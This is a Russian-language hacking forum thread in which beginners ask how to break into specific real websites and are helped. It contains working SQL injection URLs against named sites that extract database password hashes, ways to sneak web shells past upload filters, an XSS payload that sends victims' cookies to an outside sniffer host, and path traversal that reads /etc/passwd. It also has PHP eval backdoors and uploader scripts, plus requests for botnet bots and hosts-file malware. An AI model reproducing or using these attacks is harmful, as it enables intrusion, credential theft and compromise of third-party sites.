Подскжите простую( чтобы было мало исходникв) и БАЖНУЮ CMS и Форум. Чтобы потренироваться нахлжднию багов в PHP скриптах новичку который недавно освоил PHP.

Подскжите простую( чтобы было мало исходникв) и БАЖНУЮ CMS .
CMS "КЕША"

a kak izmenit chmod v shell?? naprimet 755 na 777 ??

a kak izmenit chmod v shell?? naprimet 755 na 777 ??
ты сам ответил на свой вопрос:
chmod 777 shell_file

в PasswordsPro нажми Ctrl+Alt+H
я как-то пробовал одновременно запустить PP и MD5Inside. При нажатии на эти горячие клавиши прятались обе проги, но при втором нажатии открывалась только PP, а MD5I продолжал работать скрытно, и даже при закрытии PP он не появлялся... Они юзают одинаковые хуки?

Есть доступ в админку CMS mini 0.2.2 подскажите плиз. есть ли возможность залить шел и как это сделать.

поросто грузи шелл в аплоад картинок и он у тебя появится тут :

http://sait.ru/pages/shell.php

короче когда зайдеш в админку сверху влевом углу название папки вот его и подставляй вместо pages

ЗЫ 1) не из той cms Тебе дал

пробуй провести удаленный инклуд

/blocks/reg.php?l=http://shell/

2) поросто грузи шелл в аплоад картинок и он у тебя появится тут :

http://sait.ru/pages/shell.php

1)способ: там такой папки и файла нет в CMSmini
2) я сам хотел тот способ с заливом шела вместо картинки попробовать, но даже не мог подумать о такой кривизны рук.
3)Спасибо +
PS в тему зашол злой дядя Grey. Жалко что он меня игнорит =(

union select 1,1,1,1,1 from focum-tut.users--

ошибка: for the right syntax to use near '-forum.phpbb_users-- LIMIT 0, 1' at line 1

С дефиса режет. как обойти?

union select 1,1,1,1,1 from focum-tut.users--

ошибка: for the right syntax to use near '-forum.phpbb_users-- LIMIT 0, 1' at line 1

С дефиса режет. как обойти?

тильды заюзать

union select 1,1,1,1,1 from `focum-tut.users`--

r00nix a kuda etu napisat ?? v imyu na shell files naprimer chmod 777 index.php tak ??[I]

r00nix a kuda etu napisat ?? v imyu na shell files naprimer chmod 777 index.php tak ??[I]
в command execute

a v c99 kuda ??[I]

Кокой chmod надо выставить bind.pl(скрипт для прослушки порта) чтобы на серве он запустился и открыл порт с наибольше вероятностью.
и запскать его так? perl bind.pl
add// Злой дядя Grey опять зашёл в тему и мне не ответил =(

755

a kuda napisat v c99 shell ?? chmod 777 index.php ??

подскажите,пожалуйста,нашё л sql-injection,при попытке подбора полей выдаёт ошибку
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'u' AND num_begin < 'nion selec' AND num_end > 'nion selec'' at line 1

Видимо поле для ввода информации ограничено 10-тью символами. Как обойти?
запрос делаю такой:

POST http://www.host.ru/activation HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://www.host.ru/
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.host.ru
Content-Length: 14
Proxy-Connection: Keep-Alive
Pragma: no-cache

num='+union+select+1/*

подскажите,пожалуйста,нашё л sql-injection,при попытке подбора полей выдаёт ошибку
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'u' AND num_begin < 'nion selec' AND num_end > 'nion selec'' at line 1

Видимо поле для ввода информации ограничено 10-тью символами. Как обойти?
запрос делаю такой:

POST http://www.host.ru/activation HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://www.host.ru/
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.host.ru
Content-Length: 14
Proxy-Connection: Keep-Alive
Pragma: no-cache

num='+union+select+1/*

хмм ну во-первых, если POST то какие плюсы? Во-вторых дай реальный пример, не охото в небо пальцем тыкать...

хмм ну во-первых, если POST то какие плюсы? Во-вторых дай реальный пример, не охото в небо пальцем тыкать...

Постарайся так ответить,если не затруднит.
Скажи поподробней на счёт плюсов и что означает такая ошибка,впервые столкнулся с такой.
Поле,то самое num,предназначено для ввода цифр,точнее там номер телефона без +7,тобишь ещё 10 цифр.

Постарайся так ответить,если не затруднит.
Скажи поподробней на счёт плюсов и что означает такая ошибка,впервые столкнулся с такой.
Поле,то самое num,предназначено для ввода цифр,точнее там номер телефона без +7,тобишь ещё 10 цифр.

Насчёт плюсов, куда подробней, это POST запрос. Насчёт ограничилки, скорее всего это делается средствами мускула, что то типо: ORDER BY LENGTH(rubric_full_path), хотя фиг его знает, точнее сказать не могу, нужна реальная скуля, если для тебя так важен этот рессурс и ты не хочешь им делиться со всеми, кинь тогда линк в личку.

UPD, чёт тот сайт, который ты мне в личку кинул вообще признаков жизни не подаёт, тупо не пингуется даже...

Мда,тот же скрипт уже выдаёт на любые вводимые символы

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 71 bytes) in /home/geo/engine/bd.class.php on line 172 =)

З.Ы. через инеткрэк ответ приходит со скулем.
З.Ы.Ы все же насчёт плюсов,в пост запросах какие разделители тогда использовать /**/ или может &FS? я не знал что разница есть...

Памяти не хватает. Юзай одно из трех:
memory_limit = 16M to your php.ini file (recommended, if you have access)
ini_set('memory_limit', '16M'); in your sites/default/settings.php file
php_value memory_limit 16M in your .htaccess file in the Drupal root

Памяти не хватает. Юзай одно из трех:

Эм,не совсем понял,как это юзать? контент мне в общем то неважен,ошибка от БД все равно есть. Узнать бы,что она означает и как её обойти.

где взять бота для ботнета? :(

где взять бота для ботнета? :(
sdbot самый нармальный из паблика имхо...

Решил попробавать сканер уязвимостей jsky
1)http://xket.ru/index.php?dir=7&PHPSESSID=8105ef799b741f3a9e790657a93e557e

2)http://xket.ru/komm.php?news=11

Пишит , что тут SQL inj
Только где именно она? подскажите пожалуйсто

забей на сканеры, орудай руками

mssql
Вопрос.
Есть сервер с которого я вывожо базу данных№1 например таким путем:
(SELECT+TOP+1+COLUMN_NAME,TABLE_NAME+FROM+INFORMAT ION_SCHEMA.COLUMNS+WHERE+COLUMN_NAME+LIKE+'%25kind %25'+FOR+XML+RAW)--

Как вывести с базы даных№2 если они стоят на одном и томже сервере?
Имя второй я знаю.

Привет поставил этот вопрос в другой теме ,но там тихо.
есть код(предназначается для ввода в адрессную строку.)
so.addParam("allowscriptaccess", "always");
so.addParam("allownetworking", "all");
so.write("flash_player_container");
alert("Security activated!");
Взял из этого приложения(когда приложение конектиолсь то запросило http://max-iq.com/crossdomain.xml)
вот само приложение
http://vkontakte.ru/app803045

вопрос что делает приложения человеку после того как он разрешил allownetworking и allowscriptaccess.
Что содержит переменная flash_player_container???

Ребят, помогите админку пробить, уже третий день ищу...
домен pharmacyrxworld.com

Ребят, помогите админку пробить, уже третий день ищу...
домен pharmacyrxworld.com
ее может там и не быть :)
http://www.pharmacyrxworld.com/phpMyAdmin-2.8.2/
может подойдут пассы :)
-----
Народ помогите! залил шелл на сайт,знаю название уже переименованного файла,вопрос как найти его диру где он лежит?
сканю сканю ,а толку нету :(

Народ помогите! залил шелл на сайт,знаю название уже переименованного файла,вопрос как найти его диру где он лежит?
сканю сканю ,а толку нету
откуда нам знать где он лежит?

ее может там и не быть :)
http://www.pharmacyrxworld.com/phpMyAdmin-2.8.2/
может подойдут пассы :)


админка есть, ибо есть таблица админских акков в БД...

откуда нам знать где он лежит?
я спросил как его найти
nemaniak
вот для мемборов вход
http://www.pharmacyrxworld.com/refillnow.php

на серве не получается пробиндить порт. Как сделать backconnect токо не на прямую а через XP дед? возможно ли это?

nub-hacker запусти неткат не деде...кто тебе в этом мешает?

не могу залить шелл,ограничение на расширение jpg*,png*
это можно как то обойти?

2 Shadrin, на вскидку, можно попробывать:

shell.php.php.php.php.php.php.php.php.php.php.php. php.php.php.php.php.php.php.jpg
shell.php%00.jpg
shell.php.ijpg
Подмена mime типа, заливать shell.php с типом image/jpeg либо image/x-png
Всё зависит от конкретного случая, если это паблик скрипт, лучше слить сорец и разобраться что там к чему :)

я добыл кукисы что с ними дальше делать,обьясните пожалуста!

Daned
а чем подменить?ищу одна фигня вылазиет в поиске

пробуй расширения wmv,pptp,docx,pdf

зависит от настроек апача.

Помогите разобратся, как можно залить шелл через SQL inj в БД 5 версии.
Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.
Допустим на этом сайте
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,user(),database(), version())--
Возможно ли залить шелл?, 2 дня уже страдаю, но не чего не выходит

Помогите разобратся, как можно залить шелл через SQL inj в БД 5 версии.
Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.
Допустим на этом сайте
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,user(),database(), version())--
Возможно ли залить шелл?, 2 дня уже страдаю, но не чего не выходит

А что ты читал, и как понял, что описывается именно 4 версия?

В твоем случае не зальёшь.

1. Кавычки экранируется, о чем сообщает ошибка
http://tipik.ru/outtop.php?uid=-238+union+select+'hello'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/gener123/domains/tipik.ru/public_html/outtop.php on line 12

2. file_priv = N
http://tipik.ru/outtop.php?uid=-238+union+select+load_file(0x2F686F6D652F67656E657 23132332F646F6D61696E732F746970696B2E72752F7075626 C69635F68746D6C2F6F7574746F702E706870)

Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.Я еще ни разу не видел маны по скулям, где описана конкретная версия БД. ЗЫ: В 4й и 5й ветке шеллы льются одинаково. Читай:

Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд (http://forum.antichat.ru/thread104591.html)

От себя рекомендую (сам по этой статье учился):
SQL injection полный FAQ (https://forum.antichat.ru/thread43966.html)

А что ты читал, и как понял, что описывается именно 4 версия?
file_priv+from+mysql.user+where+user=userdb
Если У значит можно залить шелл, т.е. права на запись есть.
Если N прав на запись нету, соответственно шелл залить нельзя.
В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии

В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии
ты не правильно понял. mysql.user есть везде. не везде к ней есть доступ у текущего юзера просто.

file_priv+from+mysql.user+where+user=userdb
Если У значит можно залить шелл, т.е. права на запись есть.
Если N прав на запись нету, соответственно шелл залить нельзя.
В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии


еще нужно проверить на ковычки ' ' чтобы не выдало ошибке :o

file_priv+from+mysql.user+where+user=userdb
Если У значит можно залить шелл, т.е. права на запись есть.
Если N прав на запись нету, соответственно шелл залить нельзя.
В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии

Проверить можно способом, который я описал выше load_file(). И даже, если file_priv = Y, magic_quotes_gpc = Off, это не значит, что ты зальёшь шелл в корень сайта. На многих сайтах, а точнее серверах нету прав на запись в директорию, т.е. тебе придется помучатся с поиском директории с правами на запись, либо инклюдом, чтобы проинклюдить шелл, залитый в темпорари-папку (по умолчанию /tmp).

[akep']mssql
Вопрос.
Есть сервер с которого я вывожо базу данных№1 например таким путем:


Как вывести с базы даных№2 если они стоят на одном и томже сервере?
Имя второй я знаю.
WHERE TABLE_SCHEMA='db2'
FROM [db2].[table]

Ребят, помогите админку пробить, уже третий день ищу...
домен pharmacyrxworld.com
оттуда уже все слито и откатано до предела

']
оттуда уже все слито и откатано до предела

если так то скажи, где админка висит?

Есть скрипт загрузки аватарок.
Загружаю.
В пост запросе :
Content: image/png.
Загружается всё.
И так создаю файл ava.png
Открываю блокнотом.
Вписываю <script>alert();</script>.
Заливаю, подменяю на image/png. (До этого просто text/html)
Открываю в браузере, есть текст <script>alert();</script>
В исходнике тоже.
Но невыполняется.
что делать?

Content: image/png.
Может Content-type?

В исходнике тоже.
Но невыполняется.
что делать?
Включи сниффер, посмотри ответ скрипта:
Content-Type: text/plain
text/plain - обычный текст.
text/html - HTML.

Т.е. теги не будут интерпретироваться, если браузер получит ответ text/plain.
Чтобы они интерпретировались, надо ответ text/html.

Т.е. теги не будут интерпретироваться, если браузер получит ответ text/plain.
В IE7, IE6 будет

Может Content-type?


Включи сниффер, посмотри ответ скрипта:
Content-Type: text/plain
text/plain - обычный текст.
text/html - HTML.

Т.е. теги не будут интерпретироваться, если браузер получит ответ text/plain.
Чтобы они интерпретировались, надо ответ text/html.
Ну да, просто я не запомнил :)
Примерно написал.
Сейчас проверю.

Я зашёл на сайт http://www.mymanual.ru/ и там в поиск дал скрипт xss: "><script>alert('xss')</script>
Мой вопрос: Как превратить это в форму для адресной строки, тоесть превратить этот xss в ссылку, или вы превратите и дайте мне ссылку а я сам уже пойму.

Я зашёл на ссылку http://www.mymanual.ru/search.html?q="><script>alert('xss')</script>&srcht=manuals
Но никакой окошки xss не вышло. ??????????????

Я так понял: Я сохраняю его как html и отпраляю админу, но тогда куки не пойдут через сайт http://www.mymanual.ru/
Как я понял нужно чтобы взять куки с сайта http://www.mymanual.ru/, нужно поставить код здесь: http://www.mymanual.ru/код
Верно?

Ааа..... всё понятно, вот сделал и залил на хост, вот ссылке к xss для сайта http://www.mymanual.ru/ : http://cehennem.hut1.ru/okasj9as8989v89cvxczxuiojxuxuiovjizxc.html

Супер, узнал как правильно можно сохранить отделно в файле .html и залит на хост xss.
Спасибо. +1

2 Shadrin, на вскидку, можно попробывать:

Всё зависит от конкретного случая, если это паблик скрипт, лучше слить сорец и разобраться что там к чему :)
там стоит всем известный tinymse (http://tinymce.moxiecode.com/) ,файлы изменялись в 2005 году,но залить шелл не получается,он дает название сам,и все идет после *png стирается,тоже самое с пдф и док,народ помогите..
вот это в одном из его файлов отрыл
* $RCSfile: tiny_mce.js,v $
* $Revision: 1.301 $
* $Date: 2005/10/30 16:06:56 $
source.ibiblio.org/trac/lyceum/browser/tags/0.06/src/lyceum/wp-includes/js/tinymce/
tiny_mce.js?rev=1166
вот его сорцы
у кого получиться обойти фильтр,тому $ ;)

Ответде плиизззз. Например у нас есть xss: www.site.com/id="><script>alert('xss')</script>
Что нужно вставить вместо слова xss чтобы все куки пришли мне по нажатию на ссылку?
У меня есть и сниффер, но какой код вставить вместо слова xss?

Cehennem, тебе сюда http://forum.antichat.ru/thread20140.html

Да там целая лекция. Короче: возьми любой сниффер, сделай просьбу мою, скажи адрес сниффера, а дальше я разберусь.

Да там целая лекция. Короче: возьми любой сниффер, сделай просьбу мою, скажи адрес сниффера, а дальше я разберусь.
А ты не обнаглел ли мой друг, нет?

Извените за тупые вопросы, просто я юзаю только винду :D
Чтобы скампилировать программу в среде nix, допустим эксплоит для FreeBSD, куда нужно положить исходник?
И как вообще юзать эексплоит после кампилирования?
Если что, то поправте меня

Если ты хочешь чтоб он сработал, то компилируй в примерно такой же ОС для какой и надо сплойт

gcc -o spl spl.c
и,если ошибок небыло, сплойт готов.

запускать так
./spl

Если ты хочешь чтоб он сработал, то компилируй в примерно такой же ОС для какой и надо сплойт

gcc -o spl spl.c
и,если ошибок небыло, сплойт готов.

запускать так
./spl
а путь до файла котрый надо компилировать, нужно указывать?

gcc -o spl spl.c

Задам вопрос по другому, куда надо положить исходник сплоайта, чтобы его скомпилировать, или директория неимеет значения?

Задам вопрос по другому, куда надо положить исходник сплоайта, чтобы его скомпилировать, или директория неимеет значения?

Ложи в любую папку. Потом с этой папки открывай gcc.

http://hacker-pro.net/sniffer/ для пасивных ксс там есть функция в настройках (http://hacker-pro.net/sniffer/index.php?action=set).
<script>
img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;
</script>

Опять не получилось, я с этим сниффером много пользуюсь, а вот я сделал как ты говолил, а в логах пусто.
Короче говорю тебе хсс, а ты проверь сделай и скажи мне если не трудно:
http://m.myrambler.ru/search.php?pagelen=10&query="><script>alert('xss')</script>

Старая XSS... Она срабатывает тогда, когда есть результаты поиска. В твоем случае их нету...

Понятно, я просто не тестил, в таком случае напиши там:
query=google+"><
если google неищется, попробуй любое другое слово.

Не надо советовать что-либо, если сам не знаешь / не можешь проверить! Толку то со слова google? И + кодируется в %2B, ибо без этого он считается как пробел.

то что популярное, а + нужен чтобы не искать "слово", тоесть ксс целиком.
ок, больше тут советовать на примерах небуду.
Мы про XSS говорим, а не про выдачу в поиске гугла =\. + это оператор конкатезации строк, а не "нужен чтобы не искать "слово", тоесть ксс целиком". И в URL-encode он равен %2B. Без этого он считается как пробел. Тебя никто и не запрещает советовать на примерах, просто сам сначала проверяй, а уже потом советуй.

ЗЫ: Тор не анонимен, и это доказано :)

dell

есть у когонибудь файлы вируса который правит этот файл -"C:\WINDOWS\system32\drivers\etc\hosts" если не трудно скинте ссылку где скачать можно...или как самому написать такой... вобщем интересует всё по этой теме...буду рад любой помощи...

http://m.myrambler.ru/search.php?pagelen=10&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вот это работает.

А когда ставлю ссылку из сниффера, тогда не работает.

mailbrush прав, если значение поисков нету тогда и xss нету, дело в том что в значениях поиска нет ссылки из сниффера, а раза "><script>alert('xss')</script> есть, поэтому xss как "><script>alert('xss')</script> действует, а ссылка из сниффера не действует,

Ну ты же сам написал:
"Она срабатывает тогда, когда есть результаты поиска. В твоем случае их нету..."
google, или любое другое слово, которое можно найти в поиске, для того чтобы были результаты поиска, + там и нужен как пробел.
Правда там ещё нужно добавить оператор "OR" (если яндекс поддерживает).
[слово]+OR+[xss]
Всё для того чтобы была выдача результатов.
Ну нимогу я проверить без tor, другие его в мануалы тычат, а ему лень читать, вот и решил помочь.
PS: анонимность вообще относительна.
Если я напишу Google, выдача поиска будет, но XSS нет. А если же google "><script>img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;</script> не будет выдачи, т.к. поиск ничего не найдет. И опять советуешь не проверяя... Оператора OR нету в рамблере, и при чем здесь яша? В коде + нужен как плюс, а не пробел! Ты конкатезируешь http://httpz.ru/ndemo.gif?и куки.

Cehennem, зарегай себе хост, к примеру sdagsfhfh.ru, залей файлик script.js по адресу
http://sdagsfhfh.ru/script.js
с содержанием img = new Image();
img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;

Дальше заходи http://m.myrambler.ru/search.php?pagelen=10&query="><script src="http://sdagsfhfh.ru/script.js"></script>

Потом на сниффер :) И ты увидишь стыренные куки...

У меня вопросик. есть сайтик...открыт 88 порт. там открыты две дерриктория одна админка...во второй фаил httacces - читаемый. можно туда шшел впарить. За ссылкой сайта пишите в личку.

Это обычный листинг.
Ничего не сделаешь.

Понятно =) спасибо успокоил )

Частенько встречается такая вещь, вот например сайт для примера:
http://www.bnf.fin.ec/index.php?s=-1+union+select+1/*
То есть непонятный мне запрос, вроде как и есть SQL, однако в то же время никаким образом не получается у меня составить запрос, мало того, он ещё и весь запрос на экран бабахает.
Подскажите, есть ли толк от подобных багов, или тут бесполезно что либо делать? Посимвольный брут в моём случае не вариант. Просто интересно есть вывод, или его нету.

http://www.bnf.fin.ec/index.php?s=11+union+select+1,password,3,4+from+my sql.user+order+by+1
*6AA4CFC00B1D328F27C6DEF46C4E3CBD30925B97

http://www.bnf.fin.ec/index.php?s=11+union+select+1,password,3,4+from+my sql.user+order+by+1
Больше спс.
Ещё вопрос, кто нибудь знает как в данном варианте вывести version() например?
Тут какой то фильтр фильтрует символы типа (), может есть возможность их обойти?

Как выйти за пределы заголовка в body странички, (не <title>, а того где содержится reffer, cookies итд.)
Это вообще возможно?
за какие приделы? откуда выйти? разъясняй понятней.

он видимо имеет ввиду хедеры) да?)

вопрос такой,как выставить дату заливки шелла?

http://ru.php.net/touch

del

такая беда,залил шелл, сервер : 2003 + wampserver,но файлы шелл (с99) заливать не хочет выбивает и все,на линусах некторых тоже такая фигня поскакивает, не буду же каждый раз я через админку все грузить,какие причины этого? спасибо!

причины:
1 - Не с99 единым...
2 - Есть еще "создать файл"
3 - права на запись есть?

Можно ли как-то использовать LIKE в инъекции, если кавычки экранируются? БД MySQL.

LIKE+CHAR(37,112,37)
LIKE+0x257025

такая беда,залил шелл, сервер : 2003 + wampserver,но файлы шелл (с99) заливать не хочет выбивает и все,на линусах некторых тоже такая фигня поскакивает, не буду же каждый раз я через админку все грузить,какие причины этого? спасибо!

просто может быть причина в том что он закодирован и как то этим фильтруется, поэтому в инете есть куча шеллов не кодированых, пробуй их

просто может быть причина в том что он закодирован и как то этим фильтруется, поэтому в инете есть куча шеллов не кодированых, пробуй их
Ээээ ?

"закодирован и как то этим фильтруется" -- что это должно означать?

Чем "этим" и кто "он" фильтруется, и как по причине "закодирования" может не работать заливка файлов?

я не знаю ,но на один серв когда я лил ,с99, то он у меня не лился, сам не понимал что да как , а когда залил не закодированный шелл то он залился

причины:
1 - Не с99 единым...
2 - Есть еще "создать файл"
3 - права на запись есть?
На винде есть прова на чтение запись практиски куда угодно,а вод под никсом одним и r57 не аплоадит,там сборка 1 апреля этого года,вообще не знаю чего думать,перепробовал все папки где есть прова (копи-пастил его) и пофик :confused:
p.s создать файл не катит,их надо больше штуки содавать
я не знаю ,но на один серв когда я лил ,с99, то он у меня не лился, сам не понимал что да как , а когда залил не закодированный шелл то он залился
это бывает когда ты льешь с подменой расширения

Это бывает, когда стоит антивирус, очень часто, когда серв на винде

ну там серв не на винде у меня

Это уязвимость???

http://arbrand.ru/kat_pos.php?id=-1

Это уязвимость???

http://arbrand.ru/kat_pos.php?id=-1

пробуй логику если не уверен
http://arbrand.ru/kat_pos.php?id=1+and+1=1 и
http://arbrand.ru/kat_pos.php?id=1+and+1=0

ну и различные /* -- # если резултат ни какого изменения то не уязвимость =)

ЗЫ проверил , не пашет логика =)

Shadrin, Max upload filesize ограничение скорей всего

Shadrin, Max upload filesize ограничение скорей всего
4 килобайта попробовал загурузить пофик

4 килобайта попробовал загурузить пофик


Сервак на винде? Иногда там временная папка для аплоаденных файлов не задана или некорректно задана и php не может файл прочитать.


Попробуй создай php файл следующий



<?php if(isset($_POST[ok])){
if(copy($_FILES[fnm][tmp_name], $_POST[name]))
{
echo "<a href=" . $_POST[name] . ">Click</a>";
} else {
die("err");
}
}?><form method=post enctype=multipart/form-data><input type=text name=name><input type=file name=fnm><br> <input type=submit name=ok><br></form>



и им попробуй аплоаднуть.

пробуй логику если не уверен
http://arbrand.ru/kat_pos.php?id=1+and+1=1 и
http://arbrand.ru/kat_pos.php?id=1+and+1=0

ну и различные /* -- # если резултат ни какого изменения то не уязвимость =)

ЗЫ проверил , не пашет логика =)

А вот это уязвимость???

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=-1'

это дыра в пхп кодах Пхп иньекция
Вот тебе скуля
http://www.warrencountypa.net/current/com.php?ID=1
На ней практикуйся

А вот это уязвимость???

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=-1'


это пхп инъекция

result :
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd

PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4 :D

это пхп инъекция

result :
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd

PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4 :D
1 А бываю Flash Shell на action script написанные??

2 Что полезного моно от сюда извлечь????

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news

unu']это дыра в пхп кодах Пхп иньекция
Вот тебе скуля
http://www.warrencountypa.net/current/com.php?ID=1
На ней практикуйся

Это же вроде скрытая скула???http://www.warrencountypa.net/current/com.php?ID=-1

Это же вроде скрытая скула???http://www.warrencountypa.net/current/com.php?ID=-1
Ты когда мозгами думать начнешь, а не тупо бежать задавать тупые вопросы в этой ветке?
_http://www.warrencountypa.net/current/com.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6+--+

1 А бываю Flash Shell на action script написанные??

2 Что полезного моно от сюда извлечь????

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
1. флеш исполняется на стороне юзера, нет
2. ничего

При выводе из БД выдаёт такие символы:

lIlIllIIIlllIIllIIlIlllllllIIIIlIlI

причём только из колонок username И password :)
никто не сталкивался?

могут фильтроваться колоки, или быть обманками (пустая колонка, или забитая фигней) еще можно поиграться с лимитом!!! Но я точно не знаю
Если не трудно кинь скуль в лс я гляну)))

Есть рут доступ к phpmyadmin
для раскрытия пути использовал точку после пхп сесии.
выдало мне это
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1PHP Notice: Undefined variable: id in D:\name1\sname2\www\file.php on line 6
Далее захожу в phpmyadmin выполняю,
SELECT load_file( 'D:\name1\sname2\www\file.php' ) ;
ответ NULL,(и другие файлы пробовал такая же фигня)я понял уже что замута с путями,что не так вышло я не пойму :confused:
спасибо!

Shadrin

Используй в записи пути к файлу прямые слеши, а не обратные.

спасибо cr0w

в файл пишет и вижу такой код
<? @include("http://xxx.narod.ru/a.txt"); ?>
это я как понимаю у него прав на выполнение нету?попробовал несколько папок такая фигня везде :confused:

а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал?

<?eval($_GET[e]);?> - в файл

http://сайт/путь к файлу/файл.php?e=phpinfo();

PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши.

НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.

а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал?

<?eval($_GET[e]);?> - в файл

http://сайт/путь к файлу/файл.php?e=phpinfo();

PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши.

НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.
Записал <?php phpinfo();?> вижу инфо пхп
Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу
и исходном коде <?eval($_GET[e]);?>

:confused:

Записал <?php phpinfo();?> вижу инфо пхп


о, молодца, дальше почитай phpinfo, который выводится, там много интересного и познавательного можно увидеть.

Попробуй залить теперь вместо <?phpinfo();?> такую приблудку:

<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>

запусти и попробуй залить сразу рабочий шелл с компа прямо, или не шелл, картинку например, главное залить

PS: Шеллы лить - не рутина, но ребус

Учитывая, что винда - большая вероятность антивируса, скорее всего придется искать "нормально" криптованный шелл, а не с99 стандартный из паблика. Сам у себя запусти AV и попробуй обратиться к шеллу, который льешь, например просто открыть его в ноутпаде.

если попалась стандартная ситуация - повезло. Но везет не всегда.

спасибо!хороший скрипт,тока он не хочет заливать шел,а выполняеться,а на своем хосте все норм :confused:
там сервер на винде может из за этого,у меня бывают с ними проблемы :mad:

Ищи нормальный криптованный шелл, вот что я тебе могу сказать напоследок. Если работает phpinfo - значит дело в шляпе.

все замутил)))
спасибо попугаю за его скрипит (https://forum.antichat.net/showpost.php?p=1505640&postcount=8879)
:cool:
создал в той дире с99 хз в чем дело было :confused:
ап
дело наверно в том что у деда где висит этот сайт,нет белого айпи,и аплоад не работал.
и шелл тоже файлы не грузить.Зато морда правиться :D

Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу
и исходном коде <?eval($_GET[e]);?>
Пробел нужен, <?php eval($_GET[e]); ?>

помогите с инекцией как сделать правильный запрос
SELECT SQL_CALC_FOUND_ROWS DISTINCT i.id, i.dimensions, i.prweight, i.prtype, i.processor, i.slots2 as slots, i.cards2 as cards, i.os2 as os, i.memory2 as memory, i.description2 as description, i.display2 as display, i.resolution2 as resolution, i.battery2 as battery, i.communication2 as communication, i.other2 as other, i.control2 as control, i.handcr2 as handcr, i.adddevice2 as adddevice, i.contents2 as contents, i.apps2 as apps, i.price, i.pricepromo, i.text2 as text, date_format(i.addtime,'%d/%m/%Y') as litaddtime, if(i.instock = 1,'instock','notinstock') as state, if(i.title2 <>'', i.title2,i.title2) as title, if(c.title2 <>'',c.title2,c.title2) as category, br.title as brand, br.onhp as otherbr, ifnull(im1.image,im.image) as image, im.firstimage, if(i.category_id in(1,3),1,0) as pdas, i.brand_id, i.category_id, i.status FROM items as i left join brands as br on i.brand_id = br.id left join categories as c on i.category_id = c.id left join images as im on im.item_id = i.id left join images as im1 on im1.item_id = i.id and im1.firstimage = 1 WHERE i.active=1 AND i.status ='Active' GROUP BY 